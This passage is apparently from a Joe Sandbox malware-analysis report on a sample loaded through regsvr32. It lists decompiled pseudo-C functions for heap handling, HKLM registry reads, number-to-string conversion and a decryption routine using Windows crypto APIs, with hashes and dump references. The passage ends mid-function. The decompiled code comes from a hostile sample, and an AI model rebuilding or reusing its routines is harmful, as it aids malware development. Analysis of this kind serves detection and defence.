API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: 1b23ac0938de559b93308b378a7c49f29197f74daca5bb4ee06d818de69a70a2
Instruction ID: 88de3437dd9b4ed870f5ae304ac0156c14ea9d4b567136e42e2a297234ca14cb
Opcode Fuzzy Hash: 1b23ac0938de559b93308b378a7c49f29197f74daca5bb4ee06d818de69a70a2
Instruction Fuzzy Hash: D3212975A0061AEFCB00DBA4C888D9AB779FF88704B148694E905DB316DB75EE41DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2EE0, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00FB2F08

Part of subcall function 00FB6872: SysFreeString.OLEAUT32(?), ref: 00FB6951

SafeArrayDestroy.OLEAUT32(?), ref: 00FB2F55

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: 20f5a9bcf508e4d96dce15398a5eab1a7b574c0cfbe39910110f5a6b91f455d6
Instruction ID: 1fdfd7becf06b7fb926a1180e573ce43edaa0d6e04012ee7381a37e6d3f14f5f
Opcode Fuzzy Hash: 20f5a9bcf508e4d96dce15398a5eab1a7b574c0cfbe39910110f5a6b91f455d6
Instruction Fuzzy Hash: 8C113C72A0010DBFDF019FA9CC45AEEBBB8FF04350F008065FA14E6161D3B59A15AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xfba294) == 0) {
						E00FB5076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xfba294) == 1) {
						_t10 = E00FB6B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00fb568c
0x00fb568d
0x00fb5690
0x00fb56c2
0x00fb56c4
0x00fb56c4
0x00fb5692
0x00fb5693
0x00fb56a8
0x00fb56af
0x00fb56b1
0x00fb56b1
0x00fb56af
0x00fb5693
0x00fb56cc

APIs

InterlockedIncrement.KERNEL32(00FBA294), ref: 00FB569A

Part of subcall function 00FB6B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FB6B24

InterlockedDecrement.KERNEL32(00FBA294), ref: 00FB56BA

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 4aaf451f8e58c1b562b4079d81ea1f7fda87310ab4917012a90f5dcd7fea5f34
Instruction ID: adca875b81dd46add3288c19e3aa913aefa1686c9eba7c725bdf092315043bae
Opcode Fuzzy Hash: 4aaf451f8e58c1b562b4079d81ea1f7fda87310ab4917012a90f5dcd7fea5f34
Instruction Fuzzy Hash: B0E04F79604A26578B222B779C05BDE7752AB11FA0F808524B545D1478D65CDC40FEE2

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6176, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00FB6176(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0xfba290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x00fb617b
0x00fb6180
0x00fb618e
0x00fb6194
0x00fb6198
0x00fb6209
0x00fb619a
0x00fb619e
0x00fb61a1
0x00fb61a4
0x00fb61ab
0x00fb61ac
0x00fb61ad
0x00fb61b1
0x00fb61b4
0x00fb61bb
0x00fb61c1
0x00fb61c2
0x00fb61c2
0x00fb61c9
0x00fb61ca
0x00fb61cb
0x00fb61cf
0x00fb61db
0x00fb61e1
0x00fb61e2
0x00fb61e2
0x00fb61e4
0x00fb61ea
0x00fb61ec
0x00fb61f1
0x00fb61f2
0x00fb61f2
0x00fb61f8
0x00fb6201
0x00fb6203
0x00fb6206
0x00fb6215

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00FB618E

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f67c9438e8ccbe6558380a69cf2d6b39417d386baa05e1a35314186e0b7e1b7f
Instruction ID: 1ed34978405f2374a728fd28a723a96d6aecd61c5d1d9122bb8000a0cd601ed0
Opcode Fuzzy Hash: f67c9438e8ccbe6558380a69cf2d6b39417d386baa05e1a35314186e0b7e1b7f
Instruction Fuzzy Hash: 62112C316453449FEB058F2DC852BE97B65DB53764F24408EE440DB293C17B890BCB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4576, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00FB4576(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xfba2d4; // 0x477d5a8
				_t4 = _t15 + 0xfbb390; // 0x5738938
				_t20 = _t4;
				_t6 = _t15 + 0xfbb124; // 0x650047
				_t17 = E00FB6872(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00FB3875(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00fb4580
0x00fb4582
0x00fb4589
0x00fb458a
0x00fb458b
0x00fb458c
0x00fb4592
0x00fb4597
0x00fb4597
0x00fb45a1
0x00fb45b3
0x00fb45ba
0x00fb45e9
0x00fb45bc
0x00fb45c1
0x00fb45e6
0x00fb45c3
0x00fb45c6
0x00fb45cd
0x00fb45d8
0x00fb45cf
0x00fb45d2
0x00fb45d2
0x00fb45dc
0x00fb45dc
0x00fb45c1
0x00fb45f0

APIs

Part of subcall function 00FB6872: SysFreeString.OLEAUT32(?), ref: 00FB6951

Part of subcall function 00FB3875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FB71C8,004F0053,00000000,?), ref: 00FB387E
Part of subcall function 00FB3875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FB71C8,004F0053,00000000,?), ref: 00FB38A8
Part of subcall function 00FB3875: memset.NTDLL ref: 00FB38BC

SysFreeString.OLEAUT32(00000000), ref: 00FB45DC

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 55130acde7a782e187bf2efc7b0668f5fb36cb993fe56a37b1282ce24370c83d
Instruction ID: 6dc52c829ede16b6d960a0102ecfe5b84955843ebaff91ffb22a0f763588d4b1
Opcode Fuzzy Hash: 55130acde7a782e187bf2efc7b0668f5fb36cb993fe56a37b1282ce24370c83d
Instruction Fuzzy Hash: 32015E36640429BFCB21AFA9CE44DEEBBB8FB04750F040555F951E6022D3B0A951AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1CEF, Relevance: 1.5, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00FB1CEF(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E00FB6176(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0xfba2d4; // 0x477d5a8
						_t9 = _t17 + 0xfbb9d4; // 0x444f4340
						_t20 = E00FB2F68( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0xfba290, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x00fb1cf2
0x00fb1cf8
0x00fb1d4f
0x00fb1cfe
0x00fb1d09
0x00fb1d0e
0x00fb1d12
0x00fb1d1f
0x00fb1d27
0x00fb1d33
0x00fb1d3b
0x00fb1d45
0x00fb1d45
0x00fb1d12
0x00fb1d54

APIs

Part of subcall function 00FB6176: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00FB618E

Part of subcall function 00FB2F68: lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 00FB2F9C
Part of subcall function 00FB2F68: StrStrA.SHLWAPI(00000000,?), ref: 00FB2FA9
Part of subcall function 00FB2F68: RtlAllocateHeap.NTDLL(00000000,?), ref: 00FB2FC8

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00FB6792), ref: 00FB1D45

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID:
API String ID: 2220322926-0
Opcode ID: 5b9a8b8d19dda8051816357a759fc7380593c5f8f7f91cd93a5bf6bee0102777
Instruction ID: 9e4dfac13596b3c95c53070618af087c5e22fccf3437e7feb42c797801dcf15b
Opcode Fuzzy Hash: 5b9a8b8d19dda8051816357a759fc7380593c5f8f7f91cd93a5bf6bee0102777
Instruction Fuzzy Hash: 17016976200508FFDB128B46CD40EEA7BBDFB58790F104129FA0986160E771EA14FF60

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4AFE, Relevance: 1.5, APIs: 1, Instructions: 32
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00FB4AFE(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				void* _t18;

				if(_a4 == 0) {
					L2:
					_t18 =  *0xfba0bc(_a8, _a12,  &_a4);
					if(_t18 == 0) {
						RegCloseKey(_a4);
					}
					L4:
					return _t18;
				}
				_t14 =  *0xfba2d4; // 0x477d5a8
				_t2 = _t14 + 0xfbb180; // 0x720043
				_t16 = E00FB6872(_t17, _a4, _a8, _a12, _t2, 0, 0, 0); // executed
				_t18 = _t16;
				if(_t18 == 0) {
					goto L4;
				}
				goto L2;
			}

0x00fb4b06
0x00fb4b2e
0x00fb4b3e
0x00fb4b42
0x00fb4b47
0x00fb4b47
0x00fb4b4d
0x00fb4b51
0x00fb4b51
0x00fb4b08
0x00fb4b13
0x00fb4b23
0x00fb4b28
0x00fb4b2c
0x00000000
0x00000000
0x00000000

APIs

RegCloseKey.ADVAPI32(00000000,?,00FB7728,3D00FB90,00000000,80000002,?,80000002,?,?,?,00FB1E05,80000002), ref: 00FB4B47

Part of subcall function 00FB6872: SysFreeString.OLEAUT32(?), ref: 00FB6951

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: CloseFreeString
String ID:
API String ID: 3574410727-0
Opcode ID: 8b60c9ea85375afe83df856f25e50a0b5245b78e8c076e039a789356a4645bca
Instruction ID: 0099ddc4020150f12339032c914143b4ce7409c9efc7884286c92b1cea02c2df
Opcode Fuzzy Hash: 8b60c9ea85375afe83df856f25e50a0b5245b78e8c076e039a789356a4645bca
Instruction Fuzzy Hash: 29F0343290022DBBDB229F84DC44FE97B69BB047A0F048121FE049A161C771E920EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB50CA, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB50CA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xfba290, 0, _a4); // executed
				return _t2;
			}

0x00fb50d6
0x00fb50dc

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00FB4239,00000000,00000001,?,00000000,?,?,?,00FB6B8D,00000000,?,00000001), ref: 00FB50D6

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: fa8cad9a24e5d1fa5e0e68512e73764c26ab836d2dd5d87e2b53df8fd1c87970
Instruction ID: 5e072b2d43cdf21336756ed0d281b5d7a21d33a41a870ad1b3727c88795020b3
Opcode Fuzzy Hash: fa8cad9a24e5d1fa5e0e68512e73764c26ab836d2dd5d87e2b53df8fd1c87970
Instruction Fuzzy Hash: 37B01271108108BBCB125B10DE44F057B22B750B00F004120B3080007082720420FF16

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6837, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB6837(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xfba290, 0, _a4); // executed
				return _t2;
			}

0x00fb6843
0x00fb6849

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a2b822d323e6d48a9f81642a5dbd4c7f1e8d8f2d33a9f1522d373b477a21f64f
Instruction ID: 6f60dffa0b4815c34e7c1ccb6833429417783b9aaad80501a92a73f8b5242f48
Opcode Fuzzy Hash: a2b822d323e6d48a9f81642a5dbd4c7f1e8d8f2d33a9f1522d373b477a21f64f
Instruction Fuzzy Hash: E7B0123101C108BBCA025B10DD44F057B32B754B40F104124B3040007082720420FF05

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2BE3, Relevance: 1.3, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB2BE3(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E00FB56CF(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E00FB6837(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E00FB50CA(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E00FB3984(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E00FB39C5(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x00fb2bee
0x00fb2bf1
0x00fb2bfa
0x00fb2bfd
0x00fb2c00
0x00fb2c03
0x00fb2cff
0x00fb2d03
0x00fb2c15
0x00fb2c21
0x00fb2c28
0x00fb2c2f
0x00000000
0x00000000
0x00fb2c35
0x00fb2c3d
0x00000000
0x00000000
0x00fb2c43
0x00fb2c4c
0x00fb2c50
0x00000000
0x00000000
0x00fb2c52
0x00fb2c59
0x00fb2c5e
0x00fb2c60
0x00fb2c63
0x00fb2ce4
0x00fb2ceb
0x00fb2ced
0x00000000
0x00000000
0x00fb2cef
0x00fb2cf3
0x00fb2cf8
0x00fb2cf8
0x00000000
0x00fb2cf3
0x00fb2c6a
0x00fb2c72
0x00fb2c72
0x00fb2c7b
0x00fb2c89
0x00fb2ce0
0x00fb2ce0
0x00000000
0x00fb2cac
0x00fb2caf
0x00000000
0x00fb2caf
0x00fb2c89
0x00fb2cbe
0x00fb2ccc
0x00fb2cd1
0x00fb2cd3
0x00fb2ce8
0x00000000
0x00fb2ce8
0x00fb2cd5
0x00fb2cdb
0x00fb2cde
0x00000000
0x00000000
0x00000000
0x00fb2cde

APIs

memcpy.NTDLL(00000000,?,?,?,?,00FB20FA,?,00FB20FA,?,00FB20FA), ref: 00FB2C6A

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: b886c889b787119bcde1e23be31950f49dad5c5448809bc4e40c6d9cf0c01973
Instruction ID: e6ca54423c9e37f1bde376aa3e5a84413d454b3f584c9a5a897a6b5e54a6baea
Opcode Fuzzy Hash: b886c889b787119bcde1e23be31950f49dad5c5448809bc4e40c6d9cf0c01973
Instruction Fuzzy Hash: F8311EB1D00119AFDFA1EEA6CC80BEEBB79BB14324F1040A9E515A7141D674AE44EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5384, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB5384(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E00FB6A36(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0xfba290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E00FB4576(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00fb5384
0x00fb538c
0x00fb53a3
0x00fb53be
0x00fb53c2
0x00fb53c7
0x00fb53c9
0x00fb53d9
0x00fb53e5
0x00fb53cb
0x00fb53cb
0x00fb53ce
0x00fb53d3
0x00fb53d3
0x00fb53c9
0x00fb53eb
0x00fb53ef
0x00fb53ef
0x00fb5398
0x00fb539d
0x00fb53a1
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00FB4576: SysFreeString.OLEAUT32(00000000), ref: 00FB45DC

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,00FB1AF5,?,004F0053,05739308,00000000,?), ref: 00FB53E5

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 8c06c280f337a1f9755e22c6c9a20c6d181d0703ab72cfa1deaabe12b058fbba
Instruction ID: 62ab579214366a261400f6e59092cb81c506c7327c62515e463ab5238e87a004
Opcode Fuzzy Hash: 8c06c280f337a1f9755e22c6c9a20c6d181d0703ab72cfa1deaabe12b058fbba
Instruction Fuzzy Hash: 2B01FF32501519BBCB229F45CC51FDE7BA6FB04B90F088125FE055A260D775D960EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB49FE, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00FB49FE(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00FB39C5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00FB6837(_a8 + _a8);
					if(_t21 != 0) {
						E00FB2E61(_a4, _t21, _t23);
					}
					E00FB50CA(_a4);
				}
				return _t21;
			}

0x00fb4a06
0x00fb4a0d
0x00fb4a0f
0x00fb4a1e
0x00fb4a25
0x00fb4a34
0x00fb4a38
0x00fb4a3f
0x00fb4a3f
0x00fb4a47
0x00fb4a4c
0x00fb4a51

APIs

lstrlen.KERNEL32(00000000,00000000,00FB70D9,00000000,?,00FB62B1,00000000,00FB70D9,?,00000000,00FB70D9,00000000,05739630), ref: 00FB4A0F

Part of subcall function 00FB39C5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00FB4A23,00000001,00FB70D9,00000000), ref: 00FB39FD
Part of subcall function 00FB39C5: memcpy.NTDLL(00FB4A23,00FB70D9,00000010,?,?,?,00FB4A23,00000001,00FB70D9,00000000,?,00FB62B1,00000000,00FB70D9,?,00000000), ref: 00FB3A16
Part of subcall function 00FB39C5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00FB3A3F
Part of subcall function 00FB39C5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00FB3A57
Part of subcall function 00FB39C5: memcpy.NTDLL(00000000,00000000,05739630,00000010), ref: 00FB3AA9

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: f8d93a9663182a4d2c1dba54f7d17b77e68180deeac2c555c6b33bdca6cb25b9
Instruction ID: e20e5af7be8cdc3263ec41836fe7683ff33f2dcca6e201d657d4288d13724a5a
Opcode Fuzzy Hash: f8d93a9663182a4d2c1dba54f7d17b77e68180deeac2c555c6b33bdca6cb25b9
Instruction Fuzzy Hash: D4F03A76100108BACF12AE66DC40DEF3FAEEF853A4B008022FD08CA111DA75DA55AFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1FC2, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FB1FC2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

